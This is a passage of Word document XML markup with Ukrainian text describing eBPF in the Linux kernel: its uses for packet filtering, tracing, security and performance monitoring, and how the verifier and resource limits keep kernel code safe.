          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRDefault="00C23745" w:rsidP="00BC794C">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xBPF (Socket filtering).</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Використовується для фільтрації мережевих пакетів. Це одна з перших реалізацій eBPF, де програма фільтрує пакети перед їх обробкою в мережевих стеку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F808FA" w:rsidRPr="00BC794C" w:rsidRDefault="00EA60B6" w:rsidP="00EA60B6">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3276600" cy="1727566"/>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3998" cy="1736739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRDefault="00C23745" w:rsidP="00BC794C">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Tracing (BPF-trace).</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Використовується для моніторингу подій ядра, таких як системні виклики, функції процесів і події в </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. Це корисно для відстеження поведінки системи або окремих процесів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA60B6" w:rsidRPr="00BC794C" w:rsidRDefault="00EA60B6" w:rsidP="00EA60B6">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2694587" cy="1828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6686" cy="1837012"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRDefault="00C23745" w:rsidP="00BC794C">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 Security (XDP, seccomp).</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF може використовуватися для покращення безпеки, наприклад, шляхом створення механізмів контролю доступу до системних ресурсів або мережевих підключень.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA60B6" w:rsidRPr="00BC794C" w:rsidRDefault="00EA60B6" w:rsidP="00EA60B6">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2637155" cy="1803416"/>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7252" cy="1817159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C23745" w:rsidP="00BC794C">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BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Monitoring &amp; P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>erformance (BPF perfcounters).</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Дозволяє зібрати метрики про використання ресурсів та про ефективність виконання програми, відстежуючи системні події та забезпечуючи високу точність у вимірюваннях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90B18" w:rsidRDefault="00E90B18" w:rsidP="00E90B18">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3394481" cy="63179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0471" cy="649665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90B18" w:rsidRDefault="00FD3D2E" w:rsidP="00E90B18">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В</w:t>
      </w:r>
      <w:r w:rsidR="00E90B18" w:rsidRPr="00E90B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ідстеження системних викликів</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90B18" w:rsidRDefault="00E90B18" w:rsidP="00E90B18">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3466267" cy="645160"/>
            <wp:effectExtent l="0" t="0" r="127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4331" cy="661551"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90B18" w:rsidRDefault="00E90B18" w:rsidP="00E90B18">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sidRPr="00E90B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Моніторинг використання процесора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90B18" w:rsidRDefault="00E90B18" w:rsidP="00E90B18">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3438525" cy="61717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8215" cy="624295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90B18" w:rsidRDefault="00E90B18" w:rsidP="003A17E3">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Відстеження продуктивності</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="007F018F" w:rsidP="00BC794C">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7F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Виконання коду в ядрі без перегрузки </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BF4687" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>потребує ретельного контролю за безпекою. Тому всі прог</w:t>
      </w:r>
      <w:r w:rsidR="00C20AF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">рами eBPF перевіряються через </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00C20AF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>іртуальну машину BPF (eBPF VM)</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, яка виконує код у контрольованому середовищі. Це дозволяє запобігти виконанню шкідливих або несанкціонованих дій</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [3]</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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3560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ПЗ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>проход</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> верифікацію</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед виконанням для забезпечення того, щоб вони не могли викликати системних помилок або спотворення даних.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236344" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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 </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ма</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> обмеження </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>щодо використання ресурсів (пам’</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">яті, часу процесора), що дозволяє запобігти </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">використанню </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">макросів </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">для DoS-атак </w:t>
      </w:r>
      <w:r w:rsidR="00236344">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>або</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00BC794C" w:rsidP="00236344">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>неконтрольованого виконання.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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О</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>скільки eBPF-програми виконуються в контексті ядра і мають дуже малий наклад, вони не створюють значного навантаження на систему, навіть при високому рівні моніторингу або обробки подій.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00C20AF8" w:rsidP="00BC794C">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М</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ожливість завантаження різних програм на ходу без необхідності переписувати ядро чи перезавантажувати систему дає велику гнучкість у налаштуванні системи під конкретні потреби.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="007F018F" w:rsidP="00BC794C">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7F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C20AF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00BC794C" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>рограмування через eBPF дозволяє створювати безпечні механізми моніторингу та фільтрації з мінімальними ризиками для системи, оскільки код виконується в контрольованому середовищі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC794C" w:rsidRPr="00BC794C" w:rsidRDefault="00BC794C" w:rsidP="00BC794C">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BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF широко використовується для</w:t>
      </w:r>
      <w:r w:rsidR="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC794C">
        <w:rPr>
